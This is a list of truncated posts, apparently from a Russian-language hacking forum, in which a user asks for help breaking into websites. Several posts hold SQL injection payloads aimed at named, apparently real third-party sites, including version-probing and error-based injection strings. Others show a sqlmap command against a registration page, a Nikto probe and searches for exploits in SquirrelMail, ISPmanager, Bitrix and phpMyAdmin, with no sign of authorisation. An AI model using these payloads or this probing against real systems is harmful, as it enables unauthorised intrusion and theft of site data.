Separate names with a comma.
Выручайте, не могу понять в чем дело. Вот сама скуля: http://medtonnew.conceptsite.co.il/downloader.asp?file_id=99 and 1=(SeLecT+@@version)--...
верно,есть еще по адресу /phpmyadmin/Documentation.html (phpMyAdmin 2.6.2-pl1 Documentation),но при переходе на индекс PMA: phpMyAdmin - Ошибка...
/setup/ = Невозможно загрузить или сохранить настройки (т.к. нет каталога config) [IMG] тоже странно...Юзеры же есть на сайте + инфа явно из бд...
"Сразу хочется подчеркнуть, что пасхальные яйца PHP, о которых пойдёт речь, абсолютно безобидны" =(((
Ребят,я вот понять не могу. Nikto говорит,что можно заюзать уязвимость,отправляя спец. запрос,аля: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000...
и где там версия? P.S по дате релиза - 6.5,но ведь это далеко не факт
staraya-moneta[DOT]ru - битрикс,но я не знаю версию!
Сделал. Просто мне казалось,что есть какое-то универсальное решение в случаях,когда мап так ругается.
http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(),...
SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов... + ISPmanager v4 lite. Есть ли...
python /CMS/sqlmap-master/sqlmap.py -u "http://sub.adomain.ru/users/register/ "...
http://sub.adomain.ru/users/register/ т.е. он долбит по "register"... Нежиданно.... Мне казалось,что изначально он прогоняет data-параметры...
Хорошо,уже что-то... А какой из параметров? first_name? у меня ручками не получается... (';+UNION+SELECT+error-based & etc). А вообще я запускал...
в том-то и дело,что не нашел. possible integer casting detected (e.g. "$userid=intval($_REQUEST['userid'])") at the back-end web application - ?...
Здравствуйте! Нужна помощь. Вот 2 прогона от sqlmap: #1 http://rghost.ru/private/6TmxNVXSQ/f4be5442215c6d4f07720fddf568e844 #2...
